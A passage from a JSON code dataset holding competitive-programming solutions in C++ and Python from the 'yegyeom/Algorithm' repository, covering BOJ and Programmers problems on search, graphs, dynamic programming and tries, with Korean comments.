banned_id[i].length())\n continue;\n\n flag = true;\n \n for(int k = 0 ; k < banned_id[i].length() ; k++){\n if(banned_id[i][k] != '*'){\n if(banned_id[i][k] != user_id[j][k]){\n flag = false;\n break;\n }\n }\n }\n \n if(flag){\n tmp.push_back(j);\n }\n }\n v.push_back(tmp);\n tmp.clear();\n }\n\n dfs(0, tmp);\n answer = s.size();\n\n return answer;\n}\n\nint main(){\n vector<string> user_id = {\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"};\n vector<string> banned_id = {\"fr*d*\", \"*rodo\", \"******\", \"******\"};\n\n int ans = solution(user_id, banned_id);\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.39732685685157776, "alphanum_fraction": 0.449574738740921, "avg_line_length": 17.727272033691406, "blob_id": "bc035ecb810f36d1b4961af2a2b9133fd2bccbf6", "content_id": "9e6ad5e9ea90b8c5aa93ba4dd56cc167662e58e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 833, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Binary Search/3079.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3079번: 입국심사\nDATE: 2021-03-21\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace 
std;\n#define MAX 1000000000000000000\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long n, m, total, start, end, mid;\n long long min = MAX;\n cin >> n >> m;\n\n int time[n];\n for (int i = 0; i < n; i++) {\n cin >> time[i];\n }\n\n sort(time, time + n);\n end = m * time[n - 1];\n\n while (end - start >= 0) {\n mid = (start + end) / 2;\n total = 0;\n for (int i = 0; i < n; i++) {\n total += mid / time[i];\n }\n\n if (total >= m) {\n end = mid - 1;\n if (mid < min) min = mid;\n }\n else if (total < m) {\n start = mid + 1;\n }\n }\n\n cout << min;\n\n return 0;\n}" }, { "alpha_fraction": 0.4460028111934662, "alphanum_fraction": 0.47124823927879333, "avg_line_length": 17.063291549682617, "blob_id": "4eebfcc40dd3ea7ce791a168476288821034b7bb", "content_id": "305b2dd7d0294e69848afb8bc91ab651a1c0391e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 58, "num_lines": 79, "path": "/BOJ/Graph Theory/5052.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5052번: 전화번호 목록\nDATE: 2021-03-29\n*/\n#include <iostream>\n#include <string>\n#include <cstring>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nstruct Trie {\n\tTrie* next[10];\n\tbool finish;\n\tbool nextChild;\n\n\tTrie() {\n\t\tfill(next, next + 10, nullptr);\n\t\tfinish = nextChild = false;\n\t}\n\n\tvoid insert(char* key) {\n\t\tif (*key == '\\0') { //입력 끝\n\t\t\tfinish = true;\n\t\t}\n\t\telse {\n\t\t\tint now = *key - '0';\n\n\t\t\tif (next[now] == NULL) //연결된 노드 없을 때\n\t\t\t\tnext[now] = new Trie(); \n\t\t\tnextChild = true;\n\n\t\t\tnext[now]->insert(key + 1); //다음 문자열로 넘어감\n\t\t}\n\t}\n\n\tbool find(char* key) {\n\t\tif (*key == '\\0') //노드가 생성되지 않은 경우\n\t\t\treturn false;\n\t\tif (finish) //존재하는 문자열일 경우\n\t\t\treturn true;\n\t\tint now = *key - '0';\n\t\treturn next[now]->find(key + 1); //다음 문자열로 넘어감\n\t}\n};\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t, n;\n cin >> t;\n\n for(int i = 0 ; i < t ; i++){\n bool check = false;\n char num[10001][11];\n\n cin >> n;\n Trie* trie = new Trie();\n\n for(int i = 0 ; i < n ; i++){\n cin >> num[i];\n trie->insert(num[i]);\n }\n \n for(int i = 0 ; i < n ; i++){\n if(trie->find(num[i])){ //해당 번호가 접두어로 존재\n check = true;\n break;\n }\n }\n \n if(check) \n cout << \"NO\\n\";\n else\n cout << \"YES\\n\";\n\n delete trie;\n }\n return 0;\n}" }, { "alpha_fraction": 0.44581618905067444, "alphanum_fraction": 0.49108368158340454, "avg_line_length": 16.380952835083008, "blob_id": "ff15bbc8b33dd0e7ce3da98c39239c2dd3ae31e6", "content_id": "822908729222c9415362eeeab97b7472f98aa0ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 785, "license_type": "no_license", "max_line_length": 81, "num_lines": 42, "path": "/BOJ/BFS_DFS/16953.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16953번: A → B\nDATE: 2022-03-13\n-\nx * 2 연산과 y * 10 + 1 연산 중 중복이 발생할 수 없으므로 방문 체크 안 해줘도 됨\n*/\n#include <iostream>\n#include <queue>\n#define ll long long\nusing namespace std;\n\nll a, b;\nint cnt;\n\nvoid bfs(ll a){\n queue<pair<ll,ll>> q;\n q.push({a, 1});\n\n while(!q.empty()){\n pair<ll,ll> cur = q.front();\n q.pop();\n\n if(cur.first == b) {\n cout << cur.second;\n return;\n }\n\n if(cur.first * 2 <= b) q.push({cur.first * 2, cur.second + 1});\n if(cur.first * 10 + 1 <= b) q.push({cur.first * 10 + 1, cur.second + 1});\n 
}\n\n cout << -1;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> a >> b;\n\n bfs(a);\n\n return 0;\n}" }, { "alpha_fraction": 0.4637801945209503, "alphanum_fraction": 0.487926721572876, "avg_line_length": 20.464284896850586, "blob_id": "b4ab02b281fcdd8a6dc79dfbf571df974b6b6d6a", "content_id": "1baf0cd6209d654a0e90d9ce0c3cd7f78bf80340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/BOJ/Binary Search/2568.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2568번: 전깃줄 - 2\nDATE: 2022-02-24\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<int> inputA, inputB, lis, index;\n\nvoid backtrace(int i, int num){\n if(i == -1) return;\n if(index[i] == num){\n inputA[i] = -1; // 가장 긴 증가하는 부분 수열에 해당하는 인덱스는 -1로 처리\n backtrace(i - 1, num - 1);\n }\n else backtrace(i - 1, num);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<pair<int,int>> p;\n int n, a, b;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> a >> b;\n p.push_back({a, b});\n }\n\n sort(p.begin(), p.end());\n \n for(int i = 0 ; i < n ; i++){\n inputA.push_back(p[i].first); // A 전봇대\n inputB.push_back(p[i].second); // B 전봇대\n\n int num = p[i].second;\n int idx = lower_bound(lis.begin(), lis.end(), num) - lis.begin();\n\n if(lis.empty() || num > lis.back()) lis.push_back(num);\n else lis[idx] = num;\n\n index.push_back(idx);\n }\n \n cout << n - lis.size() << '\\n';\n\n backtrace(n - 1, lis.size() - 1); \n\n for(int i = 0 ; i < n ; i++){\n if(inputA[i] != -1) cout << inputA[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.440559446811676, "alphanum_fraction": 0.5104895234107971, "avg_line_length": 20.22222137451172, "blob_id": "65ca8a69f6ce46f908676a5326d77365c4856e36", "content_id": "1aa68791ca0a62db75222c89dbd943efcdfa0f3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 578, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/BOJ/Dynamic Programming/1149.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1149번: RGB거리\nDATE: 2021-07-27\nDynamic Programming\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint house[1000][3];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, r, g, b;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> r >> g >> b;\n house[i][0] = min(house[i-1][1], house[i-1][2]) + r;\n house[i][1] = min(house[i-1][0], house[i-1][2]) + g;\n house[i][2] = min(house[i-1][0], house[i-1][1]) + b;\n }\n\n cout << *min_element(house[n-1], house[n-1] + 3);\n\n return 0;\n}" }, { "alpha_fraction": 0.38828203082084656, "alphanum_fraction": 0.4280039668083191, "avg_line_length": 18.764705657958984, "blob_id": "27f808e6858fe8ef891393bf2ca6487502ba6b6f", "content_id": "c5c2982ab287839364627b81326a40791bb28112", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1117, "license_type": "no_license", "max_line_length": 93, "num_lines": 51, "path": "/BOJ/BFS_DFS/13549_1.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 13549번: 숨바꼭질 3\n2022-01-12\nBFS ver.\n*/\n#include <iostream>\n#include <queue>\n#define MAX 100001\nusing namespace std;\n\nint mv[3] = {2, -1, 1};\nint sec[MAX] = {0, 
};\nqueue<int> q;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, k;\n cin >> n >> k;\n\n sec[n] = 1; // 0초로 두고 시작하면 이미 방문했어도 방문하지 않은 것으로 판단된다. 따라서 초깃값을 1로 설정하고 답을 출력할 때 -1 해주는 것.\n q.push(n);\n\n while(!q.empty()){\n int cur = q.front();\n int next;\n q.pop();\n\n if(cur == k){\n cout << sec[cur] - 1;\n break;\n }\n\n for(int i = 0 ; i < 3 ; i++){\n bool flag = true;\n\n if(i > 0) { \n next = cur + mv[i];\n flag = false;\n }\n else next = cur * mv[i];\n\n if(next < 0 || next > MAX - 1 || sec[next]) continue;\n \n q.push(next);\n if(!flag) sec[next] = sec[cur] + 1;\n else sec[next] = sec[cur];\n } \n }\n\n return 0;\n}" }, { "alpha_fraction": 0.47770699858665466, "alphanum_fraction": 0.5133758187294006, "avg_line_length": 16.086956024169922, "blob_id": "b6136135881989d79f3525e9750306033c57a1ee", "content_id": "d314c92319021f5f957f26bb667450177eced66b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 801, "license_type": "no_license", "max_line_length": 59, "num_lines": 46, "path": "/BOJ/Mathematics/1990.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1990번: 소수인팰린드롬\n2021-12-26\n*/\n#include <iostream>\n#include <algorithm>\n#include <math.h>\nusing namespace std;\n\nbool isPrime(int num) {\n if(num < 2) return false;\n\n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n\n return true;\n}\n\nbool isPalindrome(string str) {\n string front, back;\n \n front = str;\n reverse(str.begin(), str.end());\n back = str;\n\n if(front == back) return true;\n else return false;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int a, b;\n cin >> a >> b;\n\n for(int i = a ; i <= 10000000 ; i++) {\n if(i > b) break;\n if(isPalindrome(to_string(i)) && isPrime(i)) {\n cout << i << '\\n';\n }\n }\n\n cout << -1;\n\n return 0;\n}" }, { "alpha_fraction": 0.38199180364608765, "alphanum_fraction": 0.425648033618927, "avg_line_length": 16.4761905670166, "blob_id": "02f888ae83c3943ccc4f27eac21e47990006735b", "content_id": "07b16f786047a93d889d56eaebe4527bb8d599b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 743, "license_type": "no_license", "max_line_length": 58, "num_lines": 42, "path": "/BOJ/BFS_DFS/2644.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2644번: 촌수계산\nDATE: 2021-10-18\nDFS\n*/\n#include <iostream>\nusing namespace std;\n\nint n, a, b, answer = -1;\nint arr[100][100];\nbool visited[100] = {false,};\n\nvoid dfs(int node, int length) {\n visited[node] = true;\n\n for(int i = 1 ; i <= n ; i++) {\n if(arr[node][i] == 1 && !visited[i]) {\n if(i == b) {\n answer = length;\n return;\n }\n dfs(i, length + 1);\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m;\n cin >> n >> a >> b >> m;\n\n for(int i = 0 ; i < m ; i++) {\n int x, y;\n cin >> x >> y;\n arr[x][y] = arr[y][x] = 1;\n }\n\n dfs(a, 1);\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.34279918670654297, "alphanum_fraction": 0.36916837096214294, "avg_line_length": 17.62264060974121, "blob_id": "9079c6c8f5be3f0b81661b80672f547157a3c794", "content_id": "ba0ac0f1a8bbfd30177ca8399a2e5487d433dba8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 994, "license_type": "no_license", "max_line_length": 58, "num_lines": 53, "path": "/BOJ/Binary Search/1920.cpp", "repo_name": 
"yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 1920번: 수 찾기\n//2021-05-25\n//Binary Search\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n bool flag = false;\n cin >> n;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n \n sort(arr, arr + n);\n\n cin >> m;\n for(int i = 0 ; i < m ; i++){\n int num;\n cin >> num;\n\n int start = 0;\n int end = n - 1;\n int mid = 0;\n\n while(start <= end){\n mid = (start + end) / 2;\n\n if(arr[mid] == num){\n cout << 1 << \"\\n\";\n flag = true;\n break;\n }\n else if(arr[mid] < num){\n start = mid + 1;\n }\n else if(arr[mid] > num){\n end = mid - 1;\n }\n }\n\n if(!flag)\n cout << 0 << \"\\n\";\n else\n flag = false;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4457399249076843, "alphanum_fraction": 0.48520180583000183, "avg_line_length": 17.295082092285156, "blob_id": "e527d5d6ba90c532093c58f6bbdaedbf826c8c2b", "content_id": "c815b994b23b2d7f7c342f12614ac6dc4596f3b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 100, "num_lines": 61, "path": "/BOJ/BFS_DFS/2178.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2178번: 미로 탐색\nDATE: 2021-01-19\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 100\n\nusing namespace std;\nint n, m;\nint maze[MAX][MAX];\nint dx[] = { 0, 0, -1, 1 };\nint dy[] = { -1, 1, 0, 0 };\nbool visited[MAX][MAX] = { false, };\n\nvoid bfs() {\n\tqueue<pair<int, int>> q;\n\tpair<int, int> p; //현재 위치\n\n\tq.push(make_pair(0, 0));\n\tvisited[0][0] = true;\n\n\twhile (!q.empty()) {\n\t\tp = q.front();\n\t\tq.pop();\n\n\t\tfor (int i = 0; i < 4; i++) {\n\t\t\tint ny = p.first + dy[i];\n\t\t\tint nx = p.second + dx[i];\n\n\t\t\tif (p.first + dy[i] < 0 || p.first + dy[i] >= n || p.second + dx[i] < 0 || p.second + dx[i] >= m)\n\t\t\t\tcontinue;\n\t\t\tif (nx >= 0 && ny >= 0 && ny < n && nx < m && maze[ny][nx] == 1 && visited[ny][nx] == false) {\n\t\t\t\tvisited[ny][nx] = true;\n\t\t\t\tq.push(make_pair(ny, nx));\n\t\t\t\tmaze[ny][nx] = maze[p.first][p.second] + 1; //거리 구하기\n\t\t\t}\n\t\t}\n\t}\n}\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\t\n\tcin >> n >> m;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tstring str;\n\t\tcin >> str;\n\t\tfor (int j = 0; j < m; j++) {\n\t\t\tmaze[i][j] = str[j] - '0';\n\t\t}\n\t}\n\n\tbfs();\n\n\tcout << maze[n - 1][m - 1];\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.37295082211494446, "alphanum_fraction": 0.44262295961380005, "avg_line_length": 15.862069129943848, "blob_id": "03df31deda58006a312e49617f3ba869773eb86b", "content_id": "4817a15455d1405e2715f560d92b9b2fa533c7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 496, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/BOJ/Dynamic Programming/9095.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9095번: 1, 2, 3 더하기\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\nusing namespace std;\nint dp[11];\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc;\n cin >> tc;\n\n dp[1] = 1;\n dp[2] = 2;\n dp[3] = 4;\n\n for(int i = 4 ; i < 11 ; i++){\n dp[i] = dp[i - 1] + dp[i - 2] + dp[i - 3];\n }\n\n for(int i = 0 ; i < tc ; i++){\n int num;\n cin >> num;\n cout << dp[num] << '\\n';\n }\n \n return 
0;\n}" }, { "alpha_fraction": 0.47975707054138184, "alphanum_fraction": 0.5050607323646545, "avg_line_length": 17.660377502441406, "blob_id": "d2ad3bb5137832edcb54ec62c3d5a581428aa81a", "content_id": "d89e8b7d341250c83556d98657df48286b25b538", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 58, "num_lines": 53, "path": "/BOJ/MST/1197_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1197번: 최소 스패닝 트리\nDATE: 2022-03-02\nPrim Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define pii pair<int,int>\n#define MAX 10001\nusing namespace std;\n\nvector<pii> edge[MAX];\nbool visited[MAX];\nint ans;\n\nvoid prim(){\n priority_queue<pii, vector<pii>, greater<pii>> pq;\n pq.push({0, 1});\n\n while(!pq.empty()){\n int dis = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(visited[cur]) continue; \n visited[cur] = true;\n ans += dis;\n\n for(int i = 0 ; i < edge[cur].size() ; i++){\n if(visited[edge[cur][i].second]) continue;\n pq.push(edge[cur][i]);\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int v, e;\n int a, b, c;\n cin >> v >> e;\n\n for(int i = 0 ; i < e ; i++){\n cin >> a >> b >> c;\n edge[a].push_back({c, b});\n edge[b].push_back({c, a});\n }\n\n prim();\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4353582561016083, "alphanum_fraction": 0.4548286497592926, "avg_line_length": 20.41666603088379, "blob_id": "20d84a663476eb76a8eac1446dd385786cbbb115", "content_id": "5b822af54a25dac1f40e1b168b8a9ba26827ddc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1388, "license_type": "no_license", "max_line_length": 97, "num_lines": 60, "path": "/BOJ/Prefix Sum/10800.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10800번: 컬러볼\nDATE: 2021-08-05\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nstruct Info{\n int size;\n int color;\n int index;\n};\n\nbool cmp(const Info& a, const Info& b){\n if(a.size == b.size) return a.color < b.color;\n return a.size < b.size;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, c, s, idx, sum_size=0;\n cin >> n;\n \n Info info[n];\n int sum_color[n]= {0,}, ans[n] = {0,};\n\n for(int i = 0 ; i < n ; i++){\n cin >> c >> s;\n info[i].size = s;\n info[i].color = c - 1;\n info[i].index = i;\n }\n\n sort(info, info + n, cmp);\n\n for(int i = 0 ; i < n ; i++){\n idx = i;\n\n for(int j = idx ; j < n ; j++){ // 같은 크기의 공만큼 idx 증가\n if(info[i].size == info[j].size) idx++;\n else break;\n }\n\n for(int j = i ; j < idx ; j++){\n ans[info[j].index] = sum_size - sum_color[info[j].color]; // 자기 공과 색이 다른 공만 잡을 수 있으므로\n }\n\n for(int j = i ; j < idx ; j++){\n sum_size += info[j].size; // 전체 크기 누적\n sum_color[info[j].color] += info[j].size; // 색상 별 크기 누적\n }\n\n i = idx - 1; // 다음 크기로 넘어감\n }\n\n for(int i = 0 ; i < n ; i++) cout << ans[i] << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.397082656621933, "alphanum_fraction": 0.4278768301010132, "avg_line_length": 20.310344696044922, "blob_id": "b505bba62dcef415d430d16dc7c31b431eb9155a", "content_id": "6beabf690cc655a82e9fcc0f2aaae1a7eca9c80b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "no_license", "max_line_length": 36, "num_lines": 29, "path": "/programmers/Level 
3/the_farthest_node.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 3: 가장 먼 노드\n# date: 2022-04-15\ndef solution(n, edge):\n graph = [[] for _ in range(n+1)]\n visited = [False] * (n + 1)\n d = [[]] * (n + 1)\n\n for a, b in edge:\n graph[a].append(b)\n graph[b].append(a)\n \n queue = []\n queue.append(1)\n visited[1] = True\n d[1] = 0\n \n while queue:\n cur = queue.pop(0)\n \n for i in graph[cur]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n d[i] = d[cur] + 1\n \n d = d[1:]\n answer = d.count(max(d))\n \n return answer" }, { "alpha_fraction": 0.44897958636283875, "alphanum_fraction": 0.5020408034324646, "avg_line_length": 15.931034088134766, "blob_id": "8f3cbfb8dd7c7180538a8ff1d2b75ee11b2e369c", "content_id": "8cb32525f42dd173621aba6aa10a38e1cf982f7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 498, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/BOJ/Dynamic Programming/1912.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1912번: 연속합\nDATE: 2021-07-20\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long input[100001];\n long long n, ans;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> input[i];\n }\n\n ans = input[0];\n\n for(int i = 1 ; i < n ; i++){\n input[i] = max(input[i], input[i] + input[i-1]);\n ans = max(ans, input[i]);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3304195702075958, "alphanum_fraction": 0.3723776340484619, "avg_line_length": 18.100000381469727, "blob_id": "8d744d426e1dc364180a80181865aaae09014e44", "content_id": "bf2b356e6250f5db1514d5d466469e8c75e54c8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 592, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Mathematics/2960.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2960번: 에라토스테네스의 체\nDATE: 2021-10-10\n*/\n#include <iostream>\n#include <math.h>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[1001] = {0, };\n int n, k, cnt = 0;\n cin >> n >> k;\n\n for(int i = 2 ; i <= n ; i++) {\n for(int j = i ; j <= n ; j += i) {\n if(arr[j] == 0) {\n cnt++;\n arr[j] = j;\n }\n if(cnt == k) {\n cout << j;\n break;\n }\n }\n if(cnt == k) break;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4482225775718689, "alphanum_fraction": 0.4822256565093994, "avg_line_length": 17.514286041259766, "blob_id": "3eeb34fb313039ba890db7b88a36ce1a5ec30912", "content_id": "3e791af8aa138b5b396c30ea94ec2863160b1adc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 695, "license_type": "no_license", "max_line_length": 84, "num_lines": 35, "path": "/BOJ/Binary Search/1300.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1300번: K번째 수\nDATE: 2022-02-09\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long n, k;\n long long left, right, mid, ans;\n\n cin >> n >> k;\n\n left = 0; right = n * n;\n\n while(left <= right) {\n long long cnt = 0;\n mid = (left + right) / 2; // K번째 수를 mid라고 설정\n\n for(int i = 1 ; i <= n ; i++) cnt += min(mid / i, n); // mid보다 작거나 같은 숫자의 
개수\n\n if(cnt < k) left = mid + 1;\n else {\n right = mid - 1;\n ans = mid; \n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4008843004703522, "alphanum_fraction": 0.4340457022190094, "avg_line_length": 21.633333206176758, "blob_id": "df75b3a3ef5c9c645d3193fc893d9c3ffa7d65f4", "content_id": "dcbfb95dac265b209d930c0363b9bfc4ef86dbfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1357, "license_type": "no_license", "max_line_length": 55, "num_lines": 60, "path": "/programmers/Level 2/tuple.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2 : Tuple\n//2019 KAKAO Winter Internship\n//2021-05-07\n#include <string>\n#include <vector>\n#include <iostream>\n#include <algorithm>\n#include <map>\nusing namespace std;\n\nbool cmp(vector<int> a, vector<int> b){\n return a.size() < b.size();\n}\n\nvector<int> solution(string s) {\n vector<vector<int>> tmp1;\n vector<int> answer, tmp2;\n map<int, int> m;\n string ss;\n\n for(int i = 0 ; i < s.length() ; i++){\n if(s[i] != '{' && s[i] != '}' && s[i] != ','){ \n ss += s[i];\n }\n else if(s[i] == ',' && s[i + 1] != '{'){\n tmp2.push_back(atoi(ss.c_str()));\n ss=\"\";\n }\n else if(s[i] == '}' && s[i + 1] != '}'){\n tmp2.push_back(atoi(ss.c_str()));\n tmp1.push_back(tmp2);\n tmp2.clear();\n ss=\"\";\n }\n }\n \n sort(tmp1.begin(), tmp1.end(), cmp);\n\n for(int i = 0 ; i < tmp1.size() ; i++){\n for(int j = 0 ; j < tmp1[i].size() ; j++){\n if(m[tmp1[i][j]] > 0)\n continue;\n answer.push_back(tmp1[i][j]);\n m[tmp1[i][j]]++;\n }\n }\n\n return answer;\n}\n\nint main(){\n string s = \"{{2},{2,1},{2,1,3},{2,1,3,4}}\";\n vector <int> answer = solution(s);\n \n for(int i = 0 ; i < answer.size(); i++){\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.45119306445121765, "alphanum_fraction": 0.494577020406723, "avg_line_length": 16.769229888916016, "blob_id": "be9600bb159ddc8967d67512146afa2879e89e1f", "content_id": "dd4b2896f18e5596b107c6eb2f30ec8652c6a040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 469, "license_type": "no_license", "max_line_length": 67, "num_lines": 26, "path": "/programmers/Level 1/find_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 소수 찾기\ndate: 2022-05-26\n*/\n#include <string>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nint isNotPrime[1000001];\n\nint solution(int n) {\n int answer = 0;\n \n for(int i = 2 ; i <= sqrt(n) ; i++){\n if(!isNotPrime[i]) {\n for(int j = i * i ; j <= n ; j += i) isNotPrime[j] = 1;\n }\n }\n \n for(int i = 2 ; i <= n ; i++){\n if(!isNotPrime[i]) answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.43414634466171265, "alphanum_fraction": 0.46097561717033386, "avg_line_length": 20.63157844543457, "blob_id": "6ccdc02b544af2226e97b13cc1435bcf50391008", "content_id": "8fec4e02e5b2f5f489e65931d74b2150e5e0b900", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 56, "num_lines": 19, "path": "/programmers/Level 3/network.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 3: 네트워크\n# date: 2022-04-15\ndef solution(n, computers):\n answer = 0\n visited = [False] * n\n \n def dfs(i, n):\n visited[i] = True;\n\n for j in range(n):\n if(computers[i][j] and visited[j] == False):\n 
dfs(j, n)\n \n for i in range(n):\n if not visited[i]:\n answer += 1;\n dfs(i, n)\n \n return answer" }, { "alpha_fraction": 0.41563186049461365, "alphanum_fraction": 0.44241538643836975, "avg_line_length": 21.822221755981445, "blob_id": "664318206c8c2f6f538d8665d22b3f44750e4520", "content_id": "0d6f88b371c2cf94c6d92dd6c12185f6fac37eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4133, "license_type": "no_license", "max_line_length": 88, "num_lines": 180, "path": "/BOJ/Implementation/21608.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 21608번: 상어 초등학교\nDATE: 2021-11-08\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <cmath>\n#define MAX 20\nusing namespace std;\nvector<int> v[MAX * MAX];\nvector<pair<int,int>> location_1, location_2;\nint classroom[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nint n;\n\nint getLikeStd(int x, int y, vector<int> like){\n int cnt = 0;\n\n for(int i = 0 